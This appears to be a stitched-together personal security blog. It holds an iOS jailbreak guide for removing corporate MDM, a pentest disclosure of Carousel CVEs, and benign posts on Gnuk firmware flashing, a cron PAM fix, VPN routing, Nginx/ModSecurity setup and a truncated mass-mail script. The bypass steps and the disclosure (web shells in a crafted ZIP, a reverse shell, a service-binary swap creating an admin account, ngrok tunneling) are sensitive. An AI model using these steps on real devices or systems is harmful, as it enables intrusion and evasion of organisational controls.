iOS 13 MDM/DEP Bypass (using Checkra1n jailbreak)

Before anyone comments about this being a bad idea, let it be known that I’m not responsible for any trouble you may get in for doing this. I’m part of the hacking team at my organization, so this is the type of thing I’m supposed to be doing, but unless you are too, I’d probably advise against this.

Using Checkra1n on my iPhone 8 running iOS 13.2.2 (downgraded from 13.2.3), I have found a way to bypass organizational MDM (forced through DEP). In my test case I was using Blackberry’s MDM services, but I believe this should work for any MDM provider.

I’m going to leave these instructions relatively vague. If you can follow them, go for it; if you can’t, you probably should not be jailbreaking your corporate device.

NOTE: This is on a device that has been freshly wiped, or at least had the contents of “/var/containers/Shared/SystemGroup/” removed. If you already have MDM applied to your device, try wiping the contents of that directory and rebooting. It’ll probably reset a lot of settings, but that seemed to remove MDM for me (and allow me to prevent its application) after a reboot.


  1. Jailbreak your device using Checkra1n.
  2. On your phone, walk through the “Welcome” wizard, set your wifi, and then when you get to the screen that says “Your organization requires policies” (not verbatim, but that’s the general message), move on to Step 3.
  3. Connect to your device using SSH via iProxy (username is root, password is alpine).
  4. Using SSH on the device, navigate to “/var/containers/Shared/SystemGroup/”.
  5. Ensure the following 2 files are present: “CloudConfigurationDetails.plist” and “CloudConfigurationSetAsideDetails.plist”.
  6. If not already installed, install the “nano” text editor on your device via “apt” (or use vi, if that’s there by default, which I assume it is).
  7. Using your text editor, modify both “CloudConfigurationDetails.plist” and “CloudConfigurationSetAsideDetails.plist”, making the following changes to both files:
    • NOTE: If any of these variables are not present, you can try just leaving them missing. If that doesn’t work, add them with the values I’ve specified.
    • Change the value of the integer “IsMDMUnremovable” to 0.
    • Change the value of the bool “IsMandatory” to false.
    • Change the value of the bool “IsSupervised” to false.
  8. Restart your device (you can either re-jailbreak it using Checkra1n or just let it boot normally; either should be fine).
  9. When booted back up, walk through the “Welcome” wizard again, and this time when you get to the corporate policy screen, click through it. You should have the option to ignore the policies and not apply them.
  10. That’s it. After you reboot again, the device will still be activated but without any MDM.
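For the curious, the edits in step 7 boil down to flipping three values. Here's a minimal sketch in Python using `plistlib`, operating on the parsed plist as a dict (on the device itself you'd just use nano/vi as described above; this only illustrates the changes):

```python
import plistlib

def strip_mdm_flags(cfg):
    """Flip the three MDM enforcement flags from step 7.

    Keys that are already missing are left missing, per the note above."""
    out = dict(cfg)
    if "IsMDMUnremovable" in out:
        out["IsMDMUnremovable"] = 0   # integer 0
    if "IsMandatory" in out:
        out["IsMandatory"] = False    # bool false
    if "IsSupervised" in out:
        out["IsSupervised"] = False   # bool false
    return out

# Hypothetical usage against a copy of the file pulled off the device:
# with open("CloudConfigurationDetails.plist", "rb") as f:
#     cfg = plistlib.load(f)
# with open("CloudConfigurationDetails.plist", "wb") as f:
#     plistlib.dump(strip_mdm_flags(cfg), f)
```

The same function would be run against both plists listed in step 5.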

NOTE: I wrote this shortly after figuring this process out. It’s possible that the policies will attempt to re-apply periodically and/or after an iOS upgrade, but I don’t know for sure. I’ll edit this post if I find any further info.

Edit: Just found this post, which says that hex-editing the Checkra1n app to increase the max_supported_version number to iOS 13.2.3 should allow devices on the most recent iOS release to be jailbroken without needing to downgrade.

Edit2: I just upgraded to 13.2.3 and my MDM-bypass is still fine (I was not prompted to re-enroll after upgrading).

Vulnerabilities in Tightrope Media Systems Carousel <= (and likely newer)

While on a recent penetration test, I discovered a digital signage system made by Tightrope Media Systems (TRMS). The client was using this software on an appliance provided by TRMS, which was essentially an x86 Windows 10 PC. I was able to gain access to the web interface of this system due to an unchanged default administrator password. I found references online to a vulnerability in this version of the system that allows an arbitrary file read (LFI) via the RenderingFetch API function (CVE-2018-14573). By reading the CVE and the API documentation, I was able to successfully read files on the system.

Local File Inclusion (LFI) via the RenderingFetch API

I attempted to read protected files, such as the SQL database of the application itself (expecting it to fail, as even if the user account did have read permission to this file, the file would have been locked). Eventually though, I found that the system included a handy database backup function which included the ability to email the backed up file to an arbitrary address. I emailed a copy of the database to myself, but found that due to a bug in the system, it did not include the actual db I wanted, just the secondary db that did not include any user authentication details.
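Conceptually, the file-read call is just a GET request with a path parameter. A sketch of what such a request URL looks like — note that the endpoint path and parameter name below are placeholders of my own, not the real Carousel API shape (the real call is in the TRMS API documentation and the CVE writeup):

```python
from urllib.parse import urlencode

def rendering_fetch_url(base, target_path):
    # NOTE: "/RenderingFetch" and "file" are hypothetical placeholders --
    # consult the Carousel API docs / CVE-2018-14573 for the actual
    # endpoint and parameter names.
    return f"{base}/RenderingFetch?" + urlencode({"file": target_path})
```

The key point is that the server hands back the contents of whatever path is supplied, subject to the service account's file permissions and file locks.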

After this disappointing result, I set out to find other ways to compromise the system. I explored the Carousel webui and found something interesting. This interface allows for the uploading of “bulletins”, or in other words, items to display on the digital signage screen.

Carousel bulletin management page

I analyzed the bulletin import mechanism and found that it appeared to accept ZIP files for uploading. Upon attempting to upload a random file, however, it was rejected as not properly formatted. In order to identify the format of these files, I found that I could export an existing bulletin and then open this ZIP file up on my system to look at the structure. Inside of the file, there is a folder called “Pages”, with another folder within that named with a random GUID. I inserted two malicious .ASPX files and then attempted to upload the file.

Malicious ASPX files inside of exported bulletin ZIP file

After this, I was able to successfully upload the ZIP file to the system. I identified the GUID of the newly created (via import) bulletin by looking at the URL attached to the preview image on the webui. To clarify, the GUID inside of the ZIP file is not the GUID once it’s imported into the system. I then attempted to navigate to the URL of the malicious ASPX files I had inserted into the ZIP, but they were not found.

Frustrated, I analyzed the original ZIP file via unzip on Linux, along with 7-Zip on Windows. It appeared that when inserting files into this ZIP archive, the path separator for files and directories was being set to the forward-slash character (“/”) rather than the backslash character (“\”). This caused the files I added to be discarded by the server upon upload. I was eventually able to see this clearly by opening the file in a hex editor.

Bad ZIP file with improperly-formatted additional file

I decided to try manually changing the “/” to a “\” for the files I had added to the archive, using a hex editor: select the offending character, type the replacement, save the file. “Surely this will not work”, I thought.

ZIP file after modifying the path-separator character of the newly added files with a hex editor
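That hex edit can also be scripted. A sketch of the idea in Python (the GUID and file names here are made up): `zipfile` always writes “/” separators, and since the entry name appears verbatim in both the local file header and the central directory, a raw byte replace flips both copies at once.

```python
import io
import zipfile

guid = "0a1b2c3d-0000-0000-0000-000000000000"  # made-up GUID
name = f"Pages/{guid}/shell.aspx"              # zipfile stores "/" separators

buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as z:
    z.writestr(name, "<!-- payload -->")

raw = buf.getvalue()
# The entry name occurs twice in the archive: once in the local file
# header and once in the central directory. Replacing the name bytes
# swaps "/" for "\" in both places, matching what Carousel expects.
patched = raw.replace(name.encode(), name.replace("/", "\\").encode())
```

Nothing in the ZIP format checksums the headers themselves, which is why a blind byte replace like this (or the hex edit above) produces an archive the server happily accepts.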

After modifying the ZIP file with the hex editing tool, I uploaded it to Carousel and found it listed in the main bulletin listing (as I had with my first attempt). I then selected the bulletin and inspected the URL of the preview image (to determine the GUID and full-path to the directory where my files had been imported).

Malicious bulletin archive successfully imported

After identifying the path to the imported files, I attempted to navigate to my malicious ASPX files in that directory. Sure enough, they loaded! I was able to successfully execute commands on the system via a web shell. I first attempted a standard directory listing of the C:\ drive, and then ran whoami.

Directory listing of C:\ drive
whoami showing application being run in context of IIS AppPool\Carousel

Running commands via the web shell became a bit tiresome, so I decided to upload a Powershell file that would connect a remote interactive shell back to my attacking system.

Downloading reverse shell to target system via Powershell
Reverse shell successfully downloaded to target system

I started a listener on my attacking machine and executed the reverse shell Powershell script via the web shell, which caused the targeted system to connect back to me and provide a fully-interactive command prompt.

With that, I had achieved arbitrary file upload and remote code execution on this system. This has been classified as CVE-2018-18930.

Despite having fully-interactive access to this system, I was still running in the context of a restricted account. I set out looking for a way to elevate my privileges. I noticed that the path that uploaded files are saved to was C:\TRMS\Web\Carousel\Media. This meant that the restricted IIS account had write-access to at least that folder. I navigated to the C:\TRMS directory and saw that it appeared an application (an installed application, as opposed to the web app) was running from another directory under the C:\TRMS folder. I issued a command to view the services running on the system and the user accounts they run under. I found two services with “Carousel” in the name running under the SYSTEM account.

Two Carousel services running as SYSTEM

After identifying these services, I issued another command to identify the path at which the executables these services used were located.

Paths of the Carousel services

I then executed a command to show the permissions (ACL) of service executables, trying to identify if we had the ability to modify these files. Sure enough, the “NT Authority\Authenticated Users” group had “Modify” permissions to the service exe file.

“NT Authority\Authenticated Users” with “Modify” permissions to Carousel.Service.exe

I built a small exe file in C# that would execute various commands I compiled into the application, such as a command to create a user account. I moved the original exe file aside and uploaded my malicious exe to the location where the service exe resides.

Malicious exe (Carousel.Service.exe) uploaded, after renaming original

I now needed to restart the service. Unfortunately, the user account I was running under did not have permission to restart services on this system. I found that it did, however, have the ability to restart the server. I ran a command to reboot, knowing that this would achieve the same thing as restarting the service (albeit with slightly higher risk, as the entire system would go down temporarily). After the system came back up, I ran a command to view the local users and administrators on the system and found that my account had been created and was now a local admin!

Rebooting system to restart service
User account “gfsec” created and made a member of the local admins group
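The payload logic itself was trivial. My actual payload was a compiled C# exe; the Python sketch below just shows the equivalent commands it ran (“gfsec” is the account from the screenshots, the password here is made up):

```python
import subprocess

def build_payload_commands(user, password):
    """Commands a SYSTEM-context service payload might run (sketch).

    'gfsec' matches the account shown above; the password is invented."""
    return [
        ["net", "user", user, password, "/add"],
        ["net", "localgroup", "Administrators", user, "/add"],
    ]

# On the target (Windows, running as SYSTEM), the service payload would do:
# for cmd in build_payload_commands("gfsec", "Str0ngPass!"):
#     subprocess.run(cmd, check=True)
```

Because the service runs as SYSTEM, these commands execute with full privileges the moment the service (re)starts.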

Now armed with a local user account belonging to the admin group, I attempted to connect directly to SMB remotely. I found, however, that the configuration of this machine did not allow for connections to essentially anything except 80 and 443. Turning off the firewall didn’t seem to help. I ended up uploading Ngrok to the system. Ngrok is a free application/service that allows for bypassing NAT and firewalls, generally used by web developers who do not have the ability to open up holes in their firewall and forward ports. The application runs on the target system and connects to a local port of your choosing; you are then given a randomly generated URL and port number through which you can connect to your target system from anywhere in the world. I ran this on the Carousel system and pointed it at the local SMB port of 445.

Ngrok running, attached to local port 445

After making the SMB port available to remote systems, I was able to authenticate via SMB with Metasploit and have full control over the system conveniently. This privilege-escalation vulnerability has been assigned CVE-2018-18931.

While exploring the system, I eventually uncovered the remnants of a system image deployment. When Windows systems are imaged, administrators can use an Unattend.xml file to control various settings on the new system. This includes local accounts and passwords. I found that the Unattend.xml file left on the system included the creation of a local admin account (along with the password). This default password has been assigned CVE-2018-18929.
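For context, the account-creation portion of an Unattend.xml looks roughly like the fragment below (structure per Microsoft's answer-file schema; the account name and value here are made up). Notably, when PlainText is false, the Value is only base64-encoded rather than actually encrypted, so a leftover answer file readily gives up the password.

```xml
<!-- fragment from inside the Microsoft-Windows-Shell-Setup component -->
<UserAccounts>
  <LocalAccounts>
    <LocalAccount wcm:action="add">
      <Name>deployadmin</Name>            <!-- made-up account name -->
      <Group>Administrators</Group>
      <Password>
        <Value>bWFkZS11cC1iYXNlNjQ=</Value>  <!-- base64, not encryption -->
        <PlainText>false</PlainText>
      </Password>
    </LocalAccount>
  </LocalAccounts>
</UserAccounts>
```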

Tightrope Media Systems was notified of these vulnerabilities in early November 2018. They responded on 11/13/2018 stating that they believed these bugs were fixed and requested the contact info of my client to ensure they were on the latest version. They have not followed up with me to discuss the specifics of these vulnerabilities. Now that approximately 90 days have elapsed since the original disclosure, this information is being made publicly available.

UPDATE (2/7/19): Tightrope Media Systems has reached out to me regarding this post and the vulnerabilities discussed. They apologized for the way that the situation was handled on their end and have stated their intention to review how they triage reported security issues. The CEO personally thanked me for my contribution to their security and committed to improving their internal processes. This is a lot better than being threatened with litigation, as has happened to me in the past from other vendors, so I applaud TRMS for their response after this came to their attention (again). If you are a customer, they have released a bulletin regarding the CVEs along with a workaround to mitigate some of the disclosed issues. They are planning to release a patch on 2/8/19.

Converting a Cheap ($2) ST-Link v2 Clone into a Hardware GPG Key

Several weeks back, I decided to re-explore the concept of hardware devices for storing GPG keys.  The Yubikey Neo, 4, and 5 all have this functionality (with varying key-length options depending on the model), but these devices are not inexpensive ($40+, though Wired magazine has been running a deal for the past several months where you can get a Yubikey 4 with a 1-year subscription to the magazine for $5).  In my search for inexpensive alternatives, I came across this post, where the author purchased very inexpensive ST-Link v2 clone devices and changed the firmware to an open-source hardware GPG implementation, called Gnuk.  I have dabbled with hardware hacking more and more over the past few years, and I’m no stranger to flashing firmware (for example, I’ve been a long-time fan of DD-WRT and OpenWRT), so I thought this sounded like a really great project.  The article was well written and had links to everything I needed to buy and install, so everything should be easy, right? Of course not, it never is, and that’s why I am writing this post rather than just letting you find the one I originally worked off of.

I was not initially familiar with the ST-Link v2, but I learned that it is a hardware tool used for interfacing with devices via SWD (Serial Wire Debug).  SWD is a protocol found in ARM devices and uses fewer wires than JTAG.  STMicroelectronics makes the official ST-Link v2 device, which I see via a Google search for between $10 – $25.  AliExpress, however, has tons of sellers offering clone devices for approximately $2.  These devices feature an STM32F103 microcontroller, which is compatible with the Gnuk firmware (or in other words, Gnuk offers this chip as a build target).  I went searching on AliExpress and found myself the cheapest device I could (factoring in shipping) and bought 5 units.  Why 5?  I figured it’d be a cool little geek gift for some of my friends, potentially, but realistically I anticipated breaking at least one of them.  Also, the nice thing about these devices is that you need an SWD programmer to re-flash the devices themselves, so you can actually use one of them to program the other ones.  My order was estimated to arrive in 19-39 days, and I was pleasantly surprised when they arrived in around 15 days.

The programmer with the cover on

With the devices now on hand, I began by compiling the firmware.  That was my first stumbling block.  The repo where the project is stored had moved since the article I was referencing was published, so I needed to track that down.  Eventually I found the repo, and cloned it onto my dev system (for reference, I was using Kali Linux, since that was the only Linux VM I had on my machine; any Debian-based variant should work fine with my instructions).

git clone
cd gnuk/
git submodule update --init
cd src/
./configure --vidpid=234b:0000 --target=ST_DONGLE
mkdir build
make

Once I built the firmware, I now needed to attach the device to my debugger and connect using OpenOCD.  Initially, I tried using one of the ST-Link v2 devices I had purchased for programming another unit, but upon running into issues I instead tried using my Bus Pirate, which also supports SWD.  However, I was unsuccessful in connecting to the device with either of these programmers.  Multiple reference articles mentioned the debug layout as (starting from the spot closest to the USB port): SWDIO, GND, SWCLK, v3.3.  Upon further inspection, I found that the units I had were physically different from those pictured in the article I referenced (and another that I found later).  In the reference posts, the 4 debug points on the board were holes, going all the way through the board.  On mine, however, they were just pads.  The underside of the boards did not have any appearance of being connected to the topside, so I was not able to poke probes through the board for a good connection.  That was the first hardware problem I encountered.

I found that if I connected v3.3 and GND from the debugger to the target device (on the header pins, rather than the debug pads) I could power the device just the same as if I were connecting them to the debug pads, meaning I had fewer unwieldy connections to deal with.  With that connected, the device powered up, but I could not get any type of data connection.  Of note, I was using clips to connect to the board so that I could grab on to the pads, since I couldn’t push anything through.

I decided that I would solder my probes to the board.  So, I needed to buy a soldering iron, since I had no clue where mine was (it’d been years).  I decided on a kit that included a multimeter, so that I could test the voltage levels coming from the board; I wanted to approach this slightly less blindly than I had thus far.  Once that kit arrived, I attempted to solder wires to the 2 data pads on the board (pads 1 and 3, if counting from 1, with 1 being closest to the USB port).  I *finally* was able to get it soldered (this stuff is really small!), but I still could not get it to connect to the ST-Link or Bus Pirate.  Also, I burned the crap out of some of the debug points in the process (some out of error, some out of frustration).  I then busted out the multimeter and started probing the board.  What I found was that the points on the board were not only physically different from the reference article boards, they were actually arranged differently too.  I found that point 1 was v3.3, and point 4 was GND.  Upon connecting power to point 1 and ground to point 4, the LED lit up just as it had when connecting to the header pins, so I knew at least those points were correct.  Points 2 and 3 had to be SWDIO and SWCLK, right?  Thankfully there were only 2 combinations I needed to test to identify which point was which.  Guess which combination worked?  Neither!

One of the devices that I burned the crap out of debug points 1 and 3

At this point I was at a loss.  I thought I had done everything correctly from a troubleshooting standpoint, but I could not explain why those two points on the board would not give me debug access.  In my frustration, I ended up buying 2 more sets of 5 boards each from AliExpress, from 2 different sellers, each with multiple pictures of the board showing that they had debug holes rather than pads.  That was 2 days ago, so now I need to wait another 15-30 days for them to arrive.  So much for this being an easy, fun project… For reference, the two listings I bought that I’m still waiting on *should* be much easier to make work; as for the bad one: stay away from it!

I’m curious and impatient, though.  So yesterday I decided to take one more stab at this.  I had no idea what debug points 2 and 3 were on that board and why they would not give me SWD access to the chip.  However, I knew what the chip itself was (due to the imprint on it that said “STM32F103”), so I thought that could help.  I Googled the pinout of the chip and identified the SWDIO and SWCLK pins.  In the image below, you can see that pin 34 corresponds to SWDIO and pin 37 is SWCLK.

STM32 chip pinout

So, now that I knew which pins on the actual chip were needed for debugging, I attempted to connect my clips to the pins.  This was about as difficult at first as I expected, as these pins are super small.  I couldn’t get pin 34 connected by itself, though I was able to connect pin 37 (since it was at the end of a row, and as such easier to grab).  Eventually, though, I decided to give up on precision and just attempt to make contact with the pins by grabbing each one needed along with a few around it.  That was much easier than attaching to just the single needed pins.  Note: I don’t know if this would work on similar or different chips, and I suppose it could potentially cause damage, so proceed with caution.

Connected to pins 34 and 37 directly on-chip

I fired up OpenOCD using my Bus Pirate, and was finally able to connect!  Hallelujah!  I was able to execute the needed commands to unlock the device, reset it, and erase the flash.  However, I was not able to write my firmware file.  Maybe I was just too impatient, but I literally gave this thing 20+ minutes to write a 128KB file, and it just wouldn’t.  From the other posts I read, it appeared from the output of OpenOCD that it should only take a matter of seconds to write the file.  Frustrated again, I decided to try to use one of the devices I bought to act as the debugger, too.  I used the OpenOCD configuration below to connect.
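For anyone trying the Bus Pirate route, my OpenOCD config for it looked roughly like the fragment below. The serial device path depends on how your Bus Pirate enumerates; /dev/ttyUSB0 is an assumption on my part.

```tcl
telnet_port 4444
source [find interface/buspirate.cfg]
buspirate_port /dev/ttyUSB0
source [find target/stm32f1x.cfg]
set WORKAREASIZE 0x10000
```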

Note: if you don’t have OpenOCD already, you can install it by typing:

sudo apt install openocd

OpenOCD config for ST-Link v2 (called openocd.cfg moving forward):

telnet_port 4444
source [find interface/stlink-v2.cfg]
source [find target/stm32f1x.cfg]
set WORKAREASIZE 0x10000

To connect, run the command:

openocd -f openocd.cfg

You should see a message about connecting to the device, and it should not exit within a few seconds. After that, you need to open a new terminal and connect to OpenOCD using Telnet:

telnet localhost 4444

Once connected via Telnet, you need to unlock the device, reset it, erase memory (for good measure), write the Gnuk binary, lock the device, and then reset it once more:

reset halt
stm32f1x unlock 0
reset halt
stm32f1x mass_erase 0
flash write_bank 0 /root/src/build/gnuk.bin 0
stm32f1x lock 0
reset halt

After that, once you connect the device to the USB port of your machine it should be detected as a GPG card! You can confirm by running the command:

gpg --card-status


Fix for Cron Failing on VMware vCenter Server Appliance (VCSA) 6.5

drew · 19 Apr 2017 · VMware

When trying to enable scheduled jobs via cron on VMware VCSA 6.5 I kept seeing the errors below, and my job would not run.

2017-04-19T09:56:01.996673-04:00 VCSA crond[104661]: PAM _pam_load_conf_file: unable to open config for password-auth
2017-04-19T09:56:01.996797-04:00 VCSA crond[104661]: PAM _pam_load_conf_file: unable to open config for password-auth
2017-04-19T09:56:01.996907-04:00 VCSA crond[104661]: PAM _pam_load_conf_file: unable to open config for password-auth
2017-04-19T09:56:01.997010-04:00 VCSA crond[104661]: (root) PAM ERROR (Permission denied)
2017-04-19T09:56:01.997116-04:00 VCSA crond[104661]: (root) FAILED to authorize user with PAM (Permission denied)

The contents of /etc/pam.d/crond had 3 references to “password-auth”; however, there was no file in /etc/pam.d called “password-auth”.  I changed “password-auth” to “system-auth” in /etc/pam.d/crond, as seen below, and everything worked.

account required
account include system-auth
session required
session include system-auth
auth include system-auth
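The fix itself is a one-line substitution (a `sed` one-liner would do the same); scripted out, it's just this — back up the file first:

```python
from pathlib import Path

def fix_crond_pam(path="/etc/pam.d/crond"):
    """Swap the dangling 'password-auth' references for 'system-auth'."""
    p = Path(path)
    text = p.read_text()
    p.write_text(text.replace("password-auth", "system-auth"))
```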

Solution for Subnet Conflict Between VPN and LAN

We had an issue at work where VPN users were having intermittent difficulty reaching servers due to a subnet conflict, i.e. the VPN network is 192.168.1.X, and so is the LAN they’re connecting from. It manifested in a strange way: application connections would fail repeatedly, but after pinging the servers in question (the first ping would fail but the next 3 would work), the application would work for a while. I finally developed a solution for this. Here’s what I did: create a Powershell script that identifies the IP address of the VPN connection, then create a static route for the and subnets (since that’s another common home subnet, as well as one running at the office) going out the VPN connection’s IP with a lower metric number than everything else. Then, set a scheduled task to run automatically when the VPN connection occurs (task triggered by event). Save the script as “Fix_VPN.ps1” at the root of the C drive and import the scheduled task (you may need to make sure that the event I have triggering this is also being generated by whatever VPN solution you’re using; we’re using built-in RAS (SSTP)).

Powershell Script:

$ErrorActionPreference = 'SilentlyContinue'
$ip = $null
$nics = [System.Net.NetworkInformation.NetworkInterface]::GetAllNetworkInterfaces()
foreach ($nic in $nics) {
   if ($nic.Name -like "*VPN*") {
      $props = $nic.GetIPProperties()
      $addresses = $props.UnicastAddresses
      foreach ($addr in $addresses) {
         $ip = $($addr.Address.IPAddressToString)
      }
   }
}
if ($ip -ne $null) {
   route delete METRIC 1 | Out-Null
   route delete METRIC 1 | Out-Null
   route add mask $ip METRIC 1 | Out-Null
   route add mask $ip METRIC 1 | Out-Null
}

Scheduled Task:

   <?xml version="1.0" encoding="UTF-16"?>
    <Task version="1.2" xmlns="">
          <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="System"&gt;&lt;Select Path="System"&gt;*[System[Provider[@Name='Rasman'] and EventID=20267]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>
        <Principal id="Author">
      <Actions Context="Author">

Nginx (Reverse SSL Proxy) with ModSecurity (Web App Firewall) on CentOS 7 (Part 1)

Today I’ll demonstrate how to install the Nginx webserver/reverse proxy, with the ModSecurity web application firewall, configured as a reverse SSL proxy, on CentOS 7.  This is useful in scenarios where you are terminating incoming SSL traffic at a centralized location and are interested in implementing a web application firewall to protect the web servers sitting behind the proxy.  This setup can also support multiple sites (ie different host names) using Server Name Indication (SNI) for SSL.  If multiple sites are being protected you will need a different SSL certificate for each site (unless a wildcard or SAN certificate will suffice for the sites in question, in which case SNI is not used).  There is an abundance of information available online showing how to do this on Ubuntu/Debian, but not for CentOS.  In Part 1 (this post) we’ll compile everything, install Nginx, and configure a reverse SSL proxy and in Part 2 we’ll configure ModSecurity.

The first step is to deploy a fresh VM with CentOS 7.  We are using the x64 version, but I don’t see why the x86 version would be any different.

Log on to the server and either elevate to a root shell or execute all commands below using sudo.

Here we download and install the EPEL (Extra Packages for Enterprise Linux) repository to provide access to some of the prerequisite packages we need.  After that we install all of the required packages.

rpm -ivh       
yum update       
yum install gc gcc gcc-c++ pcre-devel zlib-devel make wget openssl-devel libxml2-devel libxslt-devel gd-devel perl-ExtUtils-Embed GeoIP-devel gperftools gperftools-devel libatomic_ops-devel libtool httpd-devel automake curl-devel

After installing all of the prerequisite packages we create a user named “nginx” for the daemon to run as.  We also set the login shell to “nologin” to prevent a compromised account from gaining access to a real shell.

useradd nginx       
usermod -s /sbin/nologin nginx       

Now let’s download ModSecurity to the /usr/src/ directory, untar it, and change to the unpacked folder.  At the time of this writing the latest version was 2.9.0.  You can find downloads for the latest version at

cd /usr/src/       
tar xzvf modsecurity-2.9.0.tar.gz       
cd modsecurity-2.9.0/       

Now inside the source directory, run ./, then configure with the “enable-standalone-module” option, and finally make the module.

./configure --enable-standalone-module

After building the ModSecurity module, move back to the /usr/src/ directory, download Nginx, untar it, and then enter the unpacked directory.  The latest version of Nginx at the time of this writing was 1.9.7.  Newer versions can be found at

cd /usr/src/       
tar xzvf nginx-1.9.7.tar.gz       
cd nginx-1.9.7/       

After navigating to the extracted directory run configure, then make, and then make install.  The “add-module” option set with configure will point to the nginx/modsecurity/ directory which should be inside of the extracted ModSecurity directory from earlier.  The default behavior of nginx is to install to /usr/local/nginx, but in the command below we’re changing the location of where some files are stored. First, the binary “nginx” is being saved directly in /usr/sbin/ to make things easier dealing with $PATH. We’re setting the conf path to the /etc/nginx/ directory, the PID path to the /var/run/ directory, and the log paths to /var/log/nginx/. I have two reasons for changing these paths: 1 – to keep the respective folders in the standard locations, and 2 – to allow SELinux to function using default rules. There are default SELinux rules related to /sbin/nginx, /etc/nginx/, and /var/log/nginx/, and I’ve found it much easier to work with SELinux if I just keep everything possible in the locations that are already predefined. There will be more later showing how to add SELinux rules to account for the directories that aren’t predefined.

./configure --user=nginx --group=nginx --with-pcre-jit --with-debug --with-ipv6 --with-http_ssl_module --add-module=/usr/src/modsecurity-2.9.0/nginx/modsecurity --sbin-path=/usr/sbin/nginx --conf-path=/etc/nginx/nginx.conf --pid-path=/var/run/ --error-log-path=/var/log/nginx/error.log --http-log-path=/var/log/nginx/access.log
make install

Now let’s setup a systemd service to allow Nginx to autostart with the server.  In the first block of code we’ll navigate to the proper directory, then we’ll create a file to tell systemd what to do.  The second block of code will contain the contents of the file we created before that.

cd /usr/lib/systemd/system
nano nginx.service
# nginx signals reference doc:
Description=A high performance web server and a reverse proxy server

ExecStartPre=/usr/sbin/nginx -t -q -g 'daemon on; master_process on;'
ExecStart=/usr/sbin/nginx -g 'daemon on; master_process on;'
ExecReload=/usr/sbin/nginx -g 'daemon on; master_process on;' -s reload
ExecStop=-/sbin/start-stop-daemon --quiet --stop --retry QUIT/5 --pidfile /var/run/



Now we need to edit the conf file for Nginx.  Before we do that, though, we create two folders, sites-available and sites-enabled, just like in Apache, to hold our vhosts.

mkdir /etc/nginx/sites-available
mkdir /etc/nginx/sites-enabled
nano /etc/nginx/nginx.conf

Change the config file to what’s listed below. NOTE: For “worker_processes” set the number to the number of cores you wish to dedicate to the server.

user nginx;
worker_processes  1;

events {
    worker_connections  1024;

http {
    include       mime.types;
    default_type  application/octet-stream;
    sendfile        on;
    keepalive_timeout  65;
    gzip  on;
    include /etc/nginx/sites-enabled/*;
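
The note above says to match “worker_processes” to the number of cores you want to dedicate; if you’re not sure how many cores the box has, here’s a quick sketch (in Python, assuming Python is available on the server) that prints a ready-made directive:

```python
import os

# Number of CPU cores visible to the OS; use this (or a smaller
# number) as the value for worker_processes in nginx.conf.
cores = os.cpu_count()
print("worker_processes  %d;" % cores)
```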

Here we generate Diffie-Hellman parameters larger than OpenSSL’s default size of 1024 bits. We’ll do 4096.

cd /etc/ssl/certs
openssl dhparam -out dhparam.pem 4096

Now we need to create a folder to hold our SSL files. Inside of that folder we’ll create subfolders for each vhost’s certs. Though not shown below, place your certificate and key files in the vhost SSL directory. We also create a vhost config file in the sites-available directory.

mkdir /etc/nginx/ssl
mkdir /etc/nginx/ssl/localhost
nano /etc/nginx/sites-available/ssl.conf

Add the following to the file just created. Make sure for the “ssl_certificate” and “ssl_certificate_key” lines you point to the proper locations. Set the “server_name” line to the hostname of your server (make sure it matches the SSL certificate). Set the “proxy_pass” line to point to the server you’re proxying to. In the example below we’re connecting to port 80 locally, but in most cases this would be a separate server. If you have several SSL certificates and want to define one of the vhosts as default, add “default_server” on the “listen” line, between the port number and semicolon.

server {
        listen   443;

        server_name localhost;
        ssl                  on;
        ssl_certificate      /etc/nginx/ssl/localhost/localhost.crt;
        ssl_certificate_key  /etc/nginx/ssl/localhost/localhost.key;

        ssl_session_timeout  5m;

        ssl_protocols  TLSv1 TLSv1.1 TLSv1.2;
        ssl_ciphers 'EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH';
        ssl_prefer_server_ciphers on;
        ssl_session_cache shared:SSL:10m;
        ssl_dhparam /etc/ssl/certs/dhparam.pem;

        location / {
          proxy_set_header X-Real-IP  $remote_addr;
          proxy_set_header X-Forwarded-For $remote_addr;
          proxy_set_header Host $host;
          proxy_set_header X-Forwarded-Proto $scheme;
          proxy_read_timeout 90;
          proxy_pass http://localhost:80;
        }
}

Create a symlink from the site(s) in the sites-available directory to the sites-enabled directory to activate the sites. Then test to make sure the config files don’t contain any errors.

ln -s /etc/nginx/sites-available/ssl.conf /etc/nginx/sites-enabled/ssl.conf
nginx -T

Assuming nginx -T doesn’t return any errors, everything should be all ready to go! Enable the service, start it, then verify it’s running.

systemctl enable nginx.service
systemctl start nginx.service
systemctl status nginx.service

If you need to open up the firewall to allow incoming traffic, use the commands below:

firewall-cmd --add-port=443/tcp --permanent
firewall-cmd --reload

Python – Mass-Mail w/ Attachment

I wrote a Python script today to mass-mail files to our clients. Our wonderful ERP system screwed up again, leaving us with PDFs of the information we needed to send out, each filename prefixed with a unique per-recipient ID. Rather than re-generate all the documents and have them sent out properly (which likely wouldn’t have happened due to bugs in the system from a recent upgrade), we wrote this script to mail out the documents we already had. We created a CSV file with two columns: column one has the unique filename prefix, column two has the corresponding recipient’s email address.
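
To make the CSV layout concrete, here’s a minimal sketch (in modern Python; the filenames and addresses are made up) of the two-column file and the same startswith() prefix matching the script performs:

```python
import csv
import io

# A made-up two-column CSV: unique filename prefix, recipient email
sample_csv = """\
10001,[email protected]
10002,[email protected]
"""

# A made-up directory listing from the ERP export
files = ["10001_invoice_march.pdf", "10002_invoice_march.pdf", "10003_invoice_march.pdf"]

matches = []
for prefix, email in csv.reader(io.StringIO(sample_csv)):
    for name in files:
        if name.startswith(prefix):  # same prefix match used in the script
            matches.append((prefix, email, name))

print(matches)
```

Each matched triple (prefix, email, filename) is what the script feeds to its send routine; prefixes with no matching file get reported as missing.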

import csv
import os
import smtplib
import mimetypes
from email.mime.multipart import MIMEMultipart
from email import encoders
from email.mime.audio import MIMEAudio
from email.mime.base import MIMEBase
from email.mime.image import MIMEImage
from email.mime.text import MIMEText

def readCSV():
    clientCSVList = []
    try:
        #set below to the CSV file you want to read.  Two columns:
        #1 - file prefix to search
        #2 - email address to send file to
        with open("csvFile", 'rb') as csvfile:
            clientReader = csv.reader(csvfile, delimiter=',')

            missing = 0
            for clientNum, email in clientReader:
                found = False
                for file in os.listdir("folder_with_files"):
                    if file.startswith(clientNum):
                        clientCSVList.append([clientNum, email, file])
                        found = True
                if not found:
                    missing += 1
